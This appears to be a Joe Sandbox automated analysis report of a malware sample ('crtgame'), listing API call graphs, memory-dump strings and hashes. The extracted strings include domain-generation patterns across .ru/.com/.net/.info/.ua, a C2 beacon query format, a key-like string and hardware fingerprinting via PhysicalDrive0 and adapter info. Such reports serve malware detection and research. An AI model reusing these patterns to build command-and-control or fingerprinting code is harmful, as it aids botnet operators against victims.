17511->17505 17513 2c31c7b _LocaleUpdate::_LocaleUpdate 59 API calls 17512->17513 17514 2c3d62e 17513->17514 17522 2c3d525 17514->17522 17517 2c3d4c1 17518 2c31c7b _LocaleUpdate::_LocaleUpdate 59 API calls 17517->17518 17519 2c3d4d2 17518->17519 17539 2c3d2bd 17519->17539 17523 2c3d53f 17522->17523 17524 2c3d54c MultiByteToWideChar 17522->17524 17523->17524 17527 2c3d578 17524->17527 17534 2c3d571 17524->17534 17525 2c33f4b __crtGetStringTypeA_stat 6 API calls 17526 2c34e48 17525->17526 17526->17517 17528 2c3d59a __crtGetStringTypeA_stat 17527->17528 17529 2c329ac _malloc 59 API calls 17527->17529 17530 2c3d5d6 MultiByteToWideChar 17528->17530 17528->17534 17529->17528 17531 2c3d600 17530->17531 17532 2c3d5f0 GetStringTypeW 17530->17532 17535 2c3d507 17531->17535 17532->17531 17534->17525 17536 2c3d522 17535->17536 17537 2c3d511 17535->17537 17536->17534 17537->17536 17538 2c32974 ___endstdio 59 API calls 17537->17538 17538->17536 17542 2c3d2d6 MultiByteToWideChar 17539->17542 17541 2c3d335 17543 2c33f4b __crtGetStringTypeA_stat 6 API calls 17541->17543 17542->17541 17545 2c3d33c 17542->17545 17546 2c34e69 17543->17546 17544 2c3d39b MultiByteToWideChar 17547 2c3d402 17544->17547 17548 2c3d3b4 17544->17548 17551 2c329ac _malloc 59 API calls 17545->17551 17553 2c3d364 17545->17553 17546->17510 17550 2c3d507 __freea 59 API calls 17547->17550 17564 2c3f0e8 17548->17564 17550->17541 17551->17553 17552 2c3d3c8 17552->17547 17554 2c3d3de 17552->17554 17555 2c3d40a 17552->17555 17553->17541 17553->17544 17554->17547 17556 2c3f0e8 __crtLCMapStringA_stat LCMapStringW 17554->17556 17558 2c329ac _malloc 59 API calls 17555->17558 17562 2c3d432 17555->17562 17556->17547 17557 2c3f0e8 __crtLCMapStringA_stat LCMapStringW 17559 2c3d475 17557->17559 17558->17562 17560 2c3d49d 17559->17560 17563 2c3d48f WideCharToMultiByte 17559->17563 17561 2c3d507 __freea 59 API calls 17560->17561 17561->17547 17562->17547 17562->17557 17563->17560 17565 2c3f113 __crtLCMapStringA_stat 17564->17565 17566 2c3f0f8 17564->17566 17567 2c3f12a LCMapStringW 17565->17567 17566->17552 17567->17552 17568->17501 17570 2c366d5 17569->17570 17571 2c366c7 17569->17571 17572 2c3585b __close 59 API calls 17570->17572 17571->17570 17575 2c366eb 17571->17575 17573 2c366dc 17572->17573 17574 2c348f5 __close 9 API calls 17573->17574 17576 2c366e6 17574->17576 17575->17576 17577 2c3585b __close 59 API calls 17575->17577 17576->17366 17577->17573 17579 2c3cce2 RtlEncodePointer 17578->17579 17579->17579 17580 2c3ccfc 17579->17580 17580->17376 17582 2c38bc3 TlsFree 17581->17582 17583 2c38bbf 17581->17583 17582->17382 17583->17382 17584 2c74a2a 17585 2ca3c08 SHGetSpecialFolderPathA 17584->17585 17586 2ca800e 17585->17586 17587 2c2104d 17588 2c32da4 __cinit 68 API calls 17587->17588 17589 2c21057 17588->17589 17592 2c21aa9 InterlockedIncrement 17589->17592 17593 2c21ac5 WSAStartup InterlockedExchange 17592->17593 17594 2c2105c 17592->17594 17593->17594 17595 2ca3b75 CloseHandle 17596 2ca855e 17595->17596
                                                                              APIs
                                                                              • RtlInitializeCriticalSection.NTDLL(02C573D8), ref: 02C25F43
                                                                              • GetModuleHandleA.KERNEL32(ntdll.dll,sprintf), ref: 02C25F5A
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 02C25F63
                                                                              • GetModuleHandleA.KERNEL32(ntdll.dll,strcat), ref: 02C25F72
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 02C25F75
                                                                                • Part of subcall function 02C2F1E7: GetWindowsDirectoryA.KERNEL32(?,00000104,?,00000000,00000000), ref: 02C2F235
                                                                                • Part of subcall function 02C2F1E7: CreateFileA.KERNELBASE(?,00100000,00000007,00000000,00000003,02000000,00000000), ref: 02C2F256
                                                                                • Part of subcall function 02C2F1E7: GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 02C2F26A
                                                                                • Part of subcall function 02C2F1E7: CloseHandle.KERNEL32(00000000), ref: 02C2F273
                                                                              • GetTickCount.KERNEL32 ref: 02C25FB6
                                                                              • GetVersionExA.KERNEL32(02C57030), ref: 02C25FE3
                                                                              • _malloc.LIBCMT ref: 02C2600D
                                                                              • _malloc.LIBCMT ref: 02C2601D
                                                                              • _malloc.LIBCMT ref: 02C2602B
                                                                              • _malloc.LIBCMT ref: 02C26036
                                                                              • _malloc.LIBCMT ref: 02C26041
                                                                              • _malloc.LIBCMT ref: 02C2604C
                                                                              • _malloc.LIBCMT ref: 02C26057
                                                                              • _malloc.LIBCMT ref: 02C26066
                                                                              • GetProcessHeap.KERNEL32(00000000,00000004), ref: 02C2607D
                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02C26086
                                                                              • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02C26095
                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02C26098
                                                                              • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02C260A3
                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02C260A6
                                                                              • RtlEnterCriticalSection.NTDLL(02C573D8), ref: 02C260E0
                                                                              • RtlLeaveCriticalSection.NTDLL(02C573D8), ref: 02C260ED
                                                                              • _malloc.LIBCMT ref: 02C26111
                                                                                • Part of subcall function 02C329AC: __FF_MSGBANNER.LIBCMT ref: 02C329C3
                                                                                • Part of subcall function 02C329AC: __NMSG_WRITE.LIBCMT ref: 02C329CA
                                                                                • Part of subcall function 02C329AC: RtlAllocateHeap.NTDLL(00800000,00000000,00000001), ref: 02C329EF
                                                                              • _malloc.LIBCMT ref: 02C2611F
                                                                              • _malloc.LIBCMT ref: 02C26126
                                                                              • _malloc.LIBCMT ref: 02C2614A
                                                                              • QueryPerformanceCounter.KERNEL32(00000200), ref: 02C2615A
                                                                              • Sleep.KERNELBASE ref: 02C26168
                                                                              • _malloc.LIBCMT ref: 02C26174
                                                                              • _malloc.LIBCMT ref: 02C26181
                                                                              • Sleep.KERNELBASE(00001388), ref: 02C261C2
                                                                              • RtlEnterCriticalSection.NTDLL(02C573D8), ref: 02C261CD
                                                                              • RtlLeaveCriticalSection.NTDLL(02C573D8), ref: 02C261DE
                                                                              • GetTickCount.KERNEL32 ref: 02C262E5
                                                                              • wsprintfA.USER32 ref: 02C26C3B
                                                                              • InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 02C26D3D
                                                                              • InternetSetOptionA.WININET(00000000,00000002,?), ref: 02C26D65
                                                                              • InternetSetOptionA.WININET(00000000,00000005,00001388,00000004), ref: 02C26D7D
                                                                              • InternetSetOptionA.WININET(00000000,00000006,00001388,00000004), ref: 02C26D95
                                                                              • InternetOpenUrlA.WININET(00000000,?,?,000000FF,04000200,00000000), ref: 02C26DBE
                                                                              • InternetReadFile.WININET(00000000,?,00001000,?), ref: 02C26DDD
                                                                              • InternetCloseHandle.WININET(00000000), ref: 02C26DF7
                                                                              • InternetCloseHandle.WININET(00000000), ref: 02C26E02
                                                                              • RtlEnterCriticalSection.NTDLL(02C573D8), ref: 02C26E72
                                                                              • RtlLeaveCriticalSection.NTDLL(02C573D8), ref: 02C26E83
                                                                              • _malloc.LIBCMT ref: 02C26F0A
                                                                              • RtlEnterCriticalSection.NTDLL(02C573D8), ref: 02C26F1C
                                                                              • RtlLeaveCriticalSection.NTDLL(02C573D8), ref: 02C26F28
                                                                              • _malloc.LIBCMT ref: 02C26FFC
                                                                              • _strtok.LIBCMT ref: 02C2702D
                                                                              • _swscanf.LIBCMT ref: 02C27044
                                                                              • _strtok.LIBCMT ref: 02C2705B
                                                                              • Sleep.KERNEL32(000007D0), ref: 02C27162
                                                                              • RtlEnterCriticalSection.NTDLL(02C573D8), ref: 02C271E3
                                                                              • RtlLeaveCriticalSection.NTDLL(02C573D8), ref: 02C271F5
                                                                              • _sprintf.LIBCMT ref: 02C2728A
                                                                              • RtlEnterCriticalSection.NTDLL(00000020), ref: 02C2734E
                                                                              • RtlLeaveCriticalSection.NTDLL(00000020), ref: 02C27382
                                                                                • Part of subcall function 02C25D1D: _malloc.LIBCMT ref: 02C25D2B
                                                                              • _malloc.LIBCMT ref: 02C27583
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _malloc$CriticalSection$Internet$Heap$EnterLeave$Handle$Allocate$CloseFileOptionProcessSleep$AddressCountModuleOpenProcTick_strtok$CounterCreateDirectoryInitializePerformanceQueryReadTimeVersionWindows_sprintf_swscanfwsprintf
                                                                              • String ID: $%d;$/click/?counter=$<htm$Host: %s$Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$a%c%c%c%c%c%c.ru$auth_ip$auth_swith$b%c%c%c%c%c%c.com$block$c%c%c%c%c%c%c.net$client_id=%.8x&connected=%d&server_port=%d&debug=%d&os=%d.%d.%04d&dgt=%d&dti=%d$connect$d%c%c%c%c%c%c.info$disconnect$e%c%c%c%c%c%c.ua$f%c%c%c%c%c%c.ru$g%c%c%c%c%c%c.com$gR$h%c%c%c%c%c%c.net$http://$i%c%c%c%c%c%c.info$i4hiea56#7b&dfw3$idle$j%c%c%c%c%c%c.info$k%c%c%c%c%c%c.ua$l%c%c%c%c%c%c.ru$m%c%c%c%c%c%c.com$n%c%c%c%c%c%c.net$ntdll.dll$o%c%c%c%c%c%c.info$p%c%c%c%c%c%c.ua$q%c%c%c%c%c%c.ru$r%c%c%c%c%c%c.com$s%c%c%c%c%c%c.net$sprintf$strcat$t%c%c%c%c%c%c.info$u%c%c%c%c%c%c.ua$updips$updurls$urls$v%c%c%c%c%c%c.ru$w%c%c%c%c%c%c.com$x%c%c%c%c%c%c.net$y%c%c%c%c%c%c.info$z%c%c%c%c%c%c.ua
                                                                              • API String ID: 3871695393-3981972013
                                                                              • Opcode ID: 2f2a593e38ddbec710fe1fdb018efa569936ab9a2662381bc09b6a061ab1b9de
                                                                              • Instruction ID: 5bd636ab58e426e902a9c27b032de07990ea9b11ff7484ceb6dd8282c8d7446e
                                                                              • Opcode Fuzzy Hash: 2f2a593e38ddbec710fe1fdb018efa569936ab9a2662381bc09b6a061ab1b9de
                                                                              • Instruction Fuzzy Hash: DDD21CB36187A05ED315AB2C9C80B7FFBDC6B89704F59093DF5D5C6142CA28C609CBA2

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 477 2c2f3a0-2c2f3c3 LoadLibraryA 478 2c2f483-2c2f48a 477->478 479 2c2f3c9-2c2f3d7 GetProcAddress 477->479 480 2c2f47c-2c2f47d FreeLibrary 479->480 481 2c2f3dd-2c2f3ed 479->481 480->478 482 2c2f3ef-2c2f3fb GetAdaptersInfo 481->482 483 2c2f433-2c2f43b 482->483 484 2c2f3fd 482->484 486 2c2f444-2c2f449 483->486 487 2c2f43d-2c2f443 call 2c331a8 483->487 485 2c2f3ff-2c2f406 484->485 488 2c2f410-2c2f418 485->488 489 2c2f408-2c2f40c 485->489 491 2c2f477-2c2f47b 486->491 492 2c2f44b-2c2f44e 486->492 487->486 494 2c2f41b-2c2f420 488->494 489->485 493 2c2f40e 489->493 491->480 492->491 496 2c2f450-2c2f455 492->496 493->483 494->494 497 2c2f422-2c2f42f call 2c2f082 494->497 498 2c2f462-2c2f46d call 2c3354c 496->498 499 2c2f457-2c2f45f 496->499 497->483 498->491 504 2c2f46f-2c2f472 498->504 499->498 504->482
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(iphlpapi.dll,?), ref: 02C2F3B6
                                                                              • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 02C2F3CF
                                                                              • GetAdaptersInfo.IPHLPAPI(?,00000000,?,00000000), ref: 02C2F3F4
                                                                              • FreeLibrary.KERNEL32(00000000), ref: 02C2F47D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                                              • String ID: GetAdaptersInfo$iphlpapi.dll
                                                                              • API String ID: 514930453-3114217049
                                                                              • Opcode ID: b34d4a0ec53ce6848d5f65b8b7646d330071a7dc33a8ee9ab6ab5d1feabb1f7c
                                                                              • Instruction ID: a78fba5957072e23f505b07cf8bcc2892b2e81eb30b354726a67b8739e3c2400
                                                                              • Opcode Fuzzy Hash: b34d4a0ec53ce6848d5f65b8b7646d330071a7dc33a8ee9ab6ab5d1feabb1f7c
                                                                              • Instruction Fuzzy Hash: A621E671E0021DABDB10DBA8D840BEEBBF8BF48304F1441ADD545E7601DFB09A49CBA0

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 505 2c22b95-2c22baf 506 2c22bb1-2c22bb9 call 2c30510 505->506 507 2c22bc7-2c22bcb 505->507 515 2c22bbf-2c22bc2 506->515 509 2c22bdf 507->509 510 2c22bcd-2c22bd0 507->510 511 2c22be2-2c22c11 WSASetLastError WSARecv call 2c29e92 509->511 510->509 513 2c22bd2-2c22bdd call 2c30510 510->513 517 2c22c16-2c22c1d 511->517 513->515 518 2c22d30 515->518 520 2c22c1f-2c22c2a call 2c30510 517->520 521 2c22c2c-2c22c32 517->521 522 2c22d32-2c22d38 518->522 530 2c22c3f-2c22c42 520->530 524 2c22c46-2c22c48 521->524 525 2c22c34-2c22c39 call 2c30510 521->525 528 2c22c4a-2c22c4d 524->528 529 2c22c4f-2c22c60 call 2c30510 524->529 525->530 532 2c22c66-2c22c69 528->532 529->522 529->532 530->524 535 2c22c73-2c22c76 532->535 536 2c22c6b-2c22c6d 532->536 535->518 538 2c22c7c-2c22c9a call 2c30510 call 2c2166f 535->538 536->535 537 2c22d22-2c22d2d call 2c21996 536->537 537->518 545 2c22cbc-2c22cfa WSASetLastError select call 2c29e92 538->545 546 2c22c9c-2c22cba call 2c30510 call 2c2166f 538->546 551 2c22d08 545->551 552 2c22cfc-2c22d06 call 2c30510 545->552 546->518 546->545 555 2c22d15-2c22d17 551->555 556 2c22d0a-2c22d12 call 2c30510 551->556 560 2c22d19-2c22d1d 552->560 555->518 555->560 556->555 560->511
                                                                              APIs
                                                                              • WSASetLastError.WS2_32(00000000,00000000,505C3A43,00000000), ref: 02C22BE4
                                                                              • WSARecv.WS2_32(?,?,00000002,?,?,00000000,00000000), ref: 02C22C07
                                                                                • Part of subcall function 02C29E92: WSAGetLastError.WS2_32(?,00000080,00000017,02C23114), ref: 02C29EA0
                                                                              • WSASetLastError.WS2_32(?,?,?,?,00000000), ref: 02C22CD3
                                                                              • select.WS2_32(?,?,00000000,00000000,00000000), ref: 02C22CE7
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorLast$Recvselect
                                                                              • String ID: 3'
                                                                              • API String ID: 886190287-280543908
                                                                              • Opcode ID: 24d5196e0f6e908e7ed2e7e61014b9e39fd74726cd5946350c1e56d28cac2315
                                                                              • Instruction ID: 5ddd2518b54caa154688af2df3c966ab252acea1f40602a22d05014edf56077d
                                                                              • Opcode Fuzzy Hash: 24d5196e0f6e908e7ed2e7e61014b9e39fd74726cd5946350c1e56d28cac2315
                                                                              • Instruction Fuzzy Hash: 424169B29043159FDB21AF65C90476BBBE9EF84314F104D1EE89987281EFB4D548CBA2

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 562 2c2f29c-2c2f2c7 CreateFileA 563 2c2f398-2c2f39f 562->563 564 2c2f2cd-2c2f2e2 562->564 565 2c2f2e5-2c2f307 DeviceIoControl 564->565 566 2c2f340-2c2f348 565->566 567 2c2f309-2c2f311 565->567 570 2c2f351-2c2f353 566->570 571 2c2f34a-2c2f350 call 2c331a8 566->571 568 2c2f313-2c2f318 567->568 569 2c2f31a-2c2f31f 567->569 568->566 569->566 572 2c2f321-2c2f329 569->572 574 2c2f355-2c2f358 570->574 575 2c2f38e-2c2f397 CloseHandle 570->575 571->570 576 2c2f32c-2c2f331 572->576 578 2c2f374-2c2f381 call 2c3354c 574->578 579 2c2f35a-2c2f363 GetLastError 574->579 575->563 576->576 581 2c2f333-2c2f33f call 2c2f082 576->581 578->575 586 2c2f383-2c2f389 578->586 579->575 582 2c2f365-2c2f368 579->582 581->566 582->578 585 2c2f36a-2c2f371 582->585 585->578 586->565
                                                                              APIs
                                                                              • CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000,00000000,?), ref: 02C2F2BB
                                                                              • DeviceIoControl.KERNELBASE(00000000,002D1400,?,0000000C,?,00000400,00000000,00000000), ref: 02C2F2F9
                                                                              • GetLastError.KERNEL32 ref: 02C2F35A
                                                                              • CloseHandle.KERNELBASE(?), ref: 02C2F391
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseControlCreateDeviceErrorFileHandleLast
                                                                              • String ID: \\.\PhysicalDrive0
                                                                              • API String ID: 4026078076-1180397377
                                                                              • Opcode ID: 4775a730ba56492620b6f12929778c9791cac305f6d1e3f9eb30d3c411d06561
                                                                              • Instruction ID: d836136905bd0fd7d249670f7812571ca7a5c316b9793c83d57049ea69fdc241
                                                                              • Opcode Fuzzy Hash: 4775a730ba56492620b6f12929778c9791cac305f6d1e3f9eb30d3c411d06561
                                                                              • Instruction Fuzzy Hash: B631A371E0022DEBDB24DF95D984BAEBBB8EF89714F10416DE509A7680DB745B08CBD0

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02C21D11
                                                                              • GetLastError.KERNEL32 ref: 02C21D23
                                                                                • Part of subcall function 02C21712: __EH_prolog.LIBCMT ref: 02C21717
                                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02C21D59
                                                                              • GetLastError.KERNEL32 ref: 02C21D6B
                                                                              • __beginthreadex.LIBCMT ref: 02C21DB1
                                                                              • GetLastError.KERNEL32 ref: 02C21DC6
                                                                              • CloseHandle.KERNEL32(00000000), ref: 02C21DDD
                                                                              • CloseHandle.KERNEL32(00000000), ref: 02C21DEC
                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C21E14
                                                                              • CloseHandle.KERNELBASE(00000000), ref: 02C21E1B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseErrorHandleLast$CreateEvent$H_prologObjectSingleWait__beginthreadex
                                                                              • String ID: thread$thread.entry_event$thread.exit_event
                                                                              • API String ID: 831262434-3017686385
                                                                              • Opcode ID: 973cd281545e6cb044c46322a0b1c55869e2c3715a33049aa90125e393942fda
                                                                              • Instruction ID: 22705e675f5ab23f464d34b133cc5a09bf70593ac2b9aa8aa092e4989ac35be7
                                                                              • Opcode Fuzzy Hash: 973cd281545e6cb044c46322a0b1c55869e2c3715a33049aa90125e393942fda
                                                                              • Instruction Fuzzy Hash: 0A31AD769003109FD711EF24C848B2BBBE5EB84710F144A2DF8498B291DBB19D49CFD2

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • _malloc.LIBCMT ref: 02C25C48
                                                                                • Part of subcall function 02C329AC: __FF_MSGBANNER.LIBCMT ref: 02C329C3
                                                                                • Part of subcall function 02C329AC: __NMSG_WRITE.LIBCMT ref: 02C329CA
                                                                                • Part of subcall function 02C329AC: RtlAllocateHeap.NTDLL(00800000,00000000,00000001), ref: 02C329EF
                                                                              • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000023,00000000,?,?,?,00000000), ref: 02C25C68
                                                                              • lstrcpyW.KERNEL32(C:\ProgramData\rc.dat,00000000,?,?,?,00000000), ref: 02C25C70
                                                                              • lstrcatW.KERNEL32(C:\ProgramData\rc.dat,\ts.dat,?,?,?,00000000), ref: 02C25C7C
                                                                              • CreateFileW.KERNELBASE(C:\ProgramData\rc.dat,80000000,00000000,00000000,00000003,00000020,00000000,?,?,?,00000000), ref: 02C25C95
                                                                              • ReadFile.KERNEL32(00000000,?,00000008,?,00000000,?,?,?,00000000), ref: 02C25CAA
                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,00000000), ref: 02C25CB1
                                                                              • __time64.LIBCMT ref: 02C25CC5
                                                                              • CreateFileW.KERNELBASE(C:\ProgramData\rc.dat,40000000,00000000,00000000,00000002,00000022,00000000,?,?,?,00000000), ref: 02C25CE2
                                                                              • WriteFile.KERNELBASE(00000000,?,00000008,?,00000000,?,?,?,00000000), ref: 02C25CF7
                                                                              • CloseHandle.KERNELBASE(00000000,?,?,?,00000000), ref: 02C25CFE
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: File$CloseCreateHandle$AllocateFolderHeapPathReadSpecialWrite__time64_malloclstrcatlstrcpy
                                                                              • String ID: C:\ProgramData\rc.dat$\ts.dat
                                                                              • API String ID: 49968893-2903805982
                                                                              • Opcode ID: 9182b67db5289309a926dd657f14a995be0bf072d6339cac1419bf261a37c4d3
                                                                              • Instruction ID: fd5e59b67316ff85d46a4bbd9b7e3e53a31e1fc2e5e7002c86949f051fc22244
                                                                              • Opcode Fuzzy Hash: 9182b67db5289309a926dd657f14a995be0bf072d6339cac1419bf261a37c4d3
                                                                              • Instruction Fuzzy Hash: F92128759402187FE3106BA4AC88FAFFBACDB45764F004665F909A31C0DB706D4D8BA1

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 02C24CB6
                                                                              • RtlEnterCriticalSection.NTDLL(02C573D8), ref: 02C24CE2
                                                                              • RtlLeaveCriticalSection.NTDLL(02C573D8), ref: 02C24CEE
                                                                                • Part of subcall function 02C24B18: __EH_prolog.LIBCMT ref: 02C24B1D
                                                                                • Part of subcall function 02C24B18: InterlockedExchange.KERNEL32(?,00000000), ref: 02C24C1D
                                                                              • RtlEnterCriticalSection.NTDLL(02C573D8), ref: 02C24DBE
                                                                              • RtlLeaveCriticalSection.NTDLL(02C573D8), ref: 02C24DC4
                                                                              • RtlEnterCriticalSection.NTDLL(02C573D8), ref: 02C24DCB
                                                                              • RtlLeaveCriticalSection.NTDLL(02C573D8), ref: 02C24DD1
                                                                              • RtlEnterCriticalSection.NTDLL(02C573D8), ref: 02C24FD2
                                                                              • RtlLeaveCriticalSection.NTDLL(02C573D8), ref: 02C24FD8
                                                                              • RtlEnterCriticalSection.NTDLL(02C573D8), ref: 02C24FE3
                                                                              • RtlLeaveCriticalSection.NTDLL(02C573D8), ref: 02C24FEC
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalSection$EnterLeave$H_prolog$ExchangeInterlocked
                                                                              • String ID:
                                                                              • API String ID: 2062355503-0
                                                                              • Opcode ID: 5bbd14d403a5867e3891ccf04794e6a12a23ae736b010ba4da5999c1685d2a0a
                                                                              • Instruction ID: a0ef6d3f9a14619b025521645664cd1928ef2a0a123b5807542d535a4f5e0dff
                                                                              • Opcode Fuzzy Hash: 5bbd14d403a5867e3891ccf04794e6a12a23ae736b010ba4da5999c1685d2a0a
                                                                              • Instruction Fuzzy Hash: 50B14971D0026DDFDF25DF94C840BEEBBB5AF44314F10419AE80976280DBB56A89CFA6

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • RtlEnterCriticalSection.NTDLL(?), ref: 02C22706
                                                                              • CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 02C2272B
                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02C45553), ref: 02C22738
                                                                                • Part of subcall function 02C21712: __EH_prolog.LIBCMT ref: 02C21717
                                                                              • SetWaitableTimer.KERNELBASE(?,?,000493E0,00000000,00000000,00000000), ref: 02C22778
                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 02C227D9
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
                                                                              • String ID: timer
                                                                              • API String ID: 4293676635-1792073242
                                                                              • Opcode ID: 626acf4403da3557ee8b992e544865d79c94b7f9cfd312a050fefaa8d916d773
                                                                              • Instruction ID: b6b8c680e261661e69d545c8081dec970220368e842b8c74085bb0fda89a59c7
                                                                              • Opcode Fuzzy Hash: 626acf4403da3557ee8b992e544865d79c94b7f9cfd312a050fefaa8d916d773
                                                                              • Instruction Fuzzy Hash: FE317EB2909715AFD310DF65D944B17BBE8FB48B24F004A2EF85583A80DB70E918CF92

                                                                              Control-flow Graph

                                                                              APIs
                                                                                • Part of subcall function 02C2F29C: CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000,00000000,?), ref: 02C2F2BB
                                                                                • Part of subcall function 02C2F29C: DeviceIoControl.KERNELBASE(00000000,002D1400,?,0000000C,?,00000400,00000000,00000000), ref: 02C2F2F9
                                                                                • Part of subcall function 02C2F29C: GetLastError.KERNEL32 ref: 02C2F35A
                                                                                • Part of subcall function 02C2F29C: CloseHandle.KERNELBASE(?), ref: 02C2F391
                                                                                • Part of subcall function 02C2F3A0: LoadLibraryA.KERNEL32(iphlpapi.dll,?), ref: 02C2F3B6
                                                                                • Part of subcall function 02C2F3A0: GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 02C2F3CF
                                                                                • Part of subcall function 02C2F3A0: GetAdaptersInfo.IPHLPAPI(?,00000000,?,00000000), ref: 02C2F3F4
                                                                                • Part of subcall function 02C2F3A0: FreeLibrary.KERNEL32(00000000), ref: 02C2F47D
                                                                              • GetWindowsDirectoryA.KERNEL32(?,00000104,?,00000000,00000000), ref: 02C2F235
                                                                              • CreateFileA.KERNELBASE(?,00100000,00000007,00000000,00000003,02000000,00000000), ref: 02C2F256
                                                                              • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 02C2F26A
                                                                              • CloseHandle.KERNEL32(00000000), ref: 02C2F273
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: File$CloseCreateHandleLibrary$AdaptersAddressControlDeviceDirectoryErrorFreeInfoLastLoadProcTimeWindows
                                                                              • String ID: tLVh
                                                                              • API String ID: 1378705229-319918027
                                                                              • Opcode ID: a3bfa404f34c5709ae8378ee101603c7aa1f919e2c9ac0080dcec186dc6f4651
                                                                              • Instruction ID: 675e780ef15377b32b11b600a98fbbfa6158cd4e2869fc32d265bc60a145ff6a
                                                                              • Opcode Fuzzy Hash: a3bfa404f34c5709ae8378ee101603c7aa1f919e2c9ac0080dcec186dc6f4651
                                                                              • Instruction Fuzzy Hash: 3B113375D4132C6BDB20DBA5DC48FDEBB7DAB49710F000619E509A7184DBB05A4DCBD0

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
